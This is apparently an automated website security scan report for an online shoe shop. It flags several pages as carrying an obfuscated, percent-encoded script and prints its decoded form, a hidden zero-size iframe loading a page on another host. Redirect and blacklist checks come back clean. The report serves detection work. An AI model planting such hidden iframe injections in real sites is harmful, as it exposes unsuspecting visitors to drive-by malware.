Scanned pages/files
| Request | Server response | Status |
http://www.xn--djrs37l.com/ | 200 OK Content-Length: 109561 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. strHTML=""; strHTML+="%0F%15%5B%11%5CCB%12US%5E%06C%04%03P%18%0BZWF%05CT%16%0F@A%0E%3B%02%10"; strHTML+="%5D%05L%0AZ%5D%16GMT%08%15YTR%1DKBB%1FK%12QED%09EA%1CXH%09V%08%14%00%0"; strHTML+="EEW@%19QX%00DWHVPWB%05%0B%0BECY%3Dm%0E%5CT%0AX@%12JMYVXUMZ%0B%08%0BU_B"; strHTML+="P_%5CS%18%0D%0C%5B%01%08%19NS%0C%17%11AH%5B%0BTAu%5D%5DWq%15%1E%0CO%1E"; strHTML+="%11%0DCAY%10S_L%05%0E%0B%04%18n%1EP%07K%06%15%03%0CQXAUA%07_%07TKS%10%"; s ...[3937 bytes skipped]... Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe> | ||
http://www.xn--djrs37l.com/js/common.js | 200 OK Content-Length: 29050 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/index.js | 200 OK Content-Length: 2463 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/themes/SportsShoes/js/action.js | 200 OK Content-Length: 4662 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/transport.js | 200 OK Content-Length: 22507 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/utils.js | 200 OK Content-Length: 4297 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/data/flashdata/default/cycle_image.js | 200 OK Content-Length: 1351 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/index.php | 200 OK Content-Length: 109561 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. strHTML=""; strHTML+="%0F%15%5B%11%5CCB%12US%5E%06C%04%03P%18%0BZWF%05CT%16%0F@A%0E%3B%02%10"; strHTML+="%5D%05L%0AZ%5D%16GMT%08%15YTR%1DKBB%1FK%12QED%09EA%1CXH%09V%08%14%00%0"; strHTML+="EEW@%19QX%00DWHVPWB%05%0B%0BECY%3Dm%0E%5CT%0AX@%12JMYVXUMZ%0B%08%0BU_B"; strHTML+="P_%5CS%18%0D%0C%5B%01%08%19NS%0C%17%11AH%5B%0BTAu%5D%5DWq%15%1E%0CO%1E"; strHTML+="%11%0DCAY%10S_L%05%0E%0B%04%18n%1EP%07K%06%15%03%0CQXAUA%07_%07TKS%10%"; s ...[3937 bytes skipped]... Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe> | ||
http://www.xn--djrs37l.com/flow.php | 200 OK Content-Length: 53912 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. strHTML=""; strHTML+="%0F%15%5B%11%5CCB%12US%5E%06C%04%03P%18%0BZWF%05CT%16%0F@A%0E%3B%02%10"; strHTML+="%5D%05L%0AZ%5D%16GMT%08%15YTR%1DKBB%1FK%12QED%09EA%1CXH%09V%08%14%00%0"; strHTML+="EEW@%19QX%00DWHVPWB%05%0B%0BECY%3Dm%0E%5CT%0AX@%12JMYVXUMZ%0B%08%0BU_B"; strHTML+="P_%5CS%18%0D%0C%5B%01%08%19NS%0C%17%11AH%5B%0BTAu%5D%5DWq%15%1E%0CO%1E"; strHTML+="%11%0DCAY%10S_L%05%0E%0B%04%18n%1EP%07K%06%15%03%0CQXAUA%07_%07TKS%10%"; s ...[3924 bytes skipped]... Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe> | ||
http://www.xn--djrs37l.com/js/shopping_flow.js | 200 OK Content-Length: 13652 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/js/showdiv.js | 200 OK Content-Length: 2479 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/user.php | 200 OK Content-Length: 53441 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. strHTML=""; strHTML+="%0F%15%5B%11%5CCB%12US%5E%06C%04%03P%18%0BZWF%05CT%16%0F@A%0E%3B%02%10"; strHTML+="%5D%05L%0AZ%5D%16GMT%08%15YTR%1DKBB%1FK%12QED%09EA%1CXH%09V%08%14%00%0"; strHTML+="EEW@%19QX%00DWHVPWB%05%0B%0BECY%3Dm%0E%5CT%0AX@%12JMYVXUMZ%0B%08%0BU_B"; strHTML+="P_%5CS%18%0D%0C%5B%01%08%19NS%0C%17%11AH%5B%0BTAu%5D%5DWq%15%1E%0CO%1E"; strHTML+="%11%0DCAY%10S_L%05%0E%0B%04%18n%1EP%07K%06%15%03%0CQXAUA%07_%07TKS%10%"; s ...[3924 bytes skipped]... Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe> | ||
http://www.xn--djrs37l.com/js/user.js | 200 OK Content-Length: 18304 Content-Type: text/javascript | clean |
http://www.xn--djrs37l.com/pick_out.php | 200 OK Content-Length: 267144 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. strHTML=""; strHTML+="%0F%15%5B%11%5CCB%12US%5E%06C%04%03P%18%0BZWF%05CT%16%0F@A%0E%3B%02%10"; strHTML+="%5D%05L%0AZ%5D%16GMT%08%15YTR%1DKBB%1FK%12QED%09EA%1CXH%09V%08%14%00%0"; strHTML+="EEW@%19QX%00DWHVPWB%05%0B%0BECY%3Dm%0E%5CT%0AX@%12JMYVXUMZ%0B%08%0BU_B"; strHTML+="P_%5CS%18%0D%0C%5B%01%08%19NS%0C%17%11AH%5B%0BTAu%5D%5DWq%15%1E%0CO%1E"; strHTML+="%11%0DCAY%10S_L%05%0E%0B%04%18n%1EP%07K%06%15%03%0CQXAUA%07_%07TKS%10%"; s ...[3924 bytes skipped]... Decoded script: <iframe src=http://www.cuiyilin.com/images/201401/thumb_img/css/index.html width=0 height=0></iframe> | ||
http://www.xn--djrs37l.com/js/lefttime.js | 200 OK Content-Length: 3261 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--djrs37l.com
Result:
GET / HTTP/1.1
Host: xn--djrs37l.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--djrs37l.com
Referer: http://www.google.com/search?q=xn--djrs37l.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xn--djrs37l.com
Referer: http://www.google.com/search?q=xn--djrs37l.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--djrs37l.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--djrs37l.com/
Result: xn--djrs37l.com is not infected or malware details are not published yet.
Result: xn--djrs37l.com is not infected or malware details are not published yet.